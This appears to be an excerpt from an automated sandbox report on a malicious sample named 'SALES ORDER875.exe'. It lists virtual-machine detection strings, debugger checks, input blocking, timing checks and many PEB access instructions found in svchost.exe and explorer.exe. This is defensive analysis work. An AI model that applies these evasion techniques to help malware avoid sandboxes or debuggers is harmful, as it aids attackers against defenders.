Source: explorer.exe, 00000003.00000002.4130863313.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.1845154888.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000003.00000002.4135604265.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000003.00000002.4135604265.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4135604265.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.000000000982D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.1845154888.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000003.00000002.4130863313.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000003.00000002.4135604265.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000003.00000000.1839005711.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000003.00000000.1839005711.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0327096E rdtsc

1_2_0327096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_03272B60 NtClose,LdrInitializeThunk,

1_2_03272B60

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003FEAA2 BlockInput,

0_2_003FEAA2

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_003B2622

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003A4CE8 mov eax, dword ptr fs:[00000030h]	0_2_003A4CE8
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_01A911B0 mov eax, dword ptr fs:[00000030h]	0_2_01A911B0
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_01A91210 mov eax, dword ptr fs:[00000030h]	0_2_01A91210
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_01A8FBA0 mov eax, dword ptr fs:[00000030h]	0_2_01A8FBA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]	1_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03308324 mov ecx, dword ptr fs:[00000030h]	1_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]	1_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]	1_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]	1_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]	1_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]	1_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322C310 mov ecx, dword ptr fs:[00000030h]	1_2_0322C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03250310 mov ecx, dword ptr fs:[00000030h]	1_2_03250310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D437C mov eax, dword ptr fs:[00000030h]	1_2_032D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]	1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]	1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]	1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B035C mov ecx, dword ptr fs:[00000030h]	1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]	1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]	1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FA352 mov eax, dword ptr fs:[00000030h]	1_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D8350 mov ecx, dword ptr fs:[00000030h]	1_2_032D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0330634F mov eax, dword ptr fs:[00000030h]	1_2_0330634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]	1_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]	1_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]	1_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]	1_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]	1_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]	1_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]	1_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]	1_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032663FF mov eax, dword ptr fs:[00000030h]	1_2_032663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EC3CD mov eax, dword ptr fs:[00000030h]	1_2_032EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]	1_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]	1_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]	1_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]	1_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B63C0 mov eax, dword ptr fs:[00000030h]	1_2_032B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]	1_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]	1_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE3DB mov ecx, dword ptr fs:[00000030h]	1_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]	1_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]	1_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]	1_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322823B mov eax, dword ptr fs:[00000030h]	1_2_0322823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]	1_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]	1_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]	1_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322826B mov eax, dword ptr fs:[00000030h]	1_2_0322826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B8243 mov eax, dword ptr fs:[00000030h]	1_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B8243 mov ecx, dword ptr fs:[00000030h]	1_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0330625D mov eax, dword ptr fs:[00000030h]	1_2_0330625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322A250 mov eax, dword ptr fs:[00000030h]	1_2_0322A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236259 mov eax, dword ptr fs:[00000030h]	1_2_03236259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]	1_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]	1_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]	1_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]	1_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]	1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]	1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]	1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]	1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]	1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]	1_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]	1_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]	1_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]	1_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]	1_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]	1_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]	1_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]	1_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033062D6 mov eax, dword ptr fs:[00000030h]	1_2_033062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03260124 mov eax, dword ptr fs:[00000030h]	1_2_03260124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DA118 mov ecx, dword ptr fs:[00000030h]	1_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]	1_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]	1_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]	1_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F0115 mov eax, dword ptr fs:[00000030h]	1_2_032F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]	1_2_03304164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]	1_2_03304164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]	1_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]	1_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C4144 mov ecx, dword ptr fs:[00000030h]	1_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]	1_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]	1_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322C156 mov eax, dword ptr fs:[00000030h]	1_2_0322C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C8158 mov eax, dword ptr fs:[00000030h]	1_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]	1_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]	1_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03270185 mov eax, dword ptr fs:[00000030h]	1_2_03270185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]	1_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]	1_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]	1_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]	1_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]	1_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]	1_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]	1_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]	1_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]	1_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]	1_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]	1_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033061E5 mov eax, dword ptr fs:[00000030h]	1_2_033061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032601F8 mov eax, dword ptr fs:[00000030h]	1_2_032601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]	1_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]	1_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322A020 mov eax, dword ptr fs:[00000030h]	1_2_0322A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322C020 mov eax, dword ptr fs:[00000030h]	1_2_0322C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C6030 mov eax, dword ptr fs:[00000030h]	1_2_032C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B4000 mov ecx, dword ptr fs:[00000030h]	1_2_032B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]	1_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]	1_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]	1_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]	1_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325C073 mov eax, dword ptr fs:[00000030h]	1_2_0325C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03232050 mov eax, dword ptr fs:[00000030h]	1_2_03232050
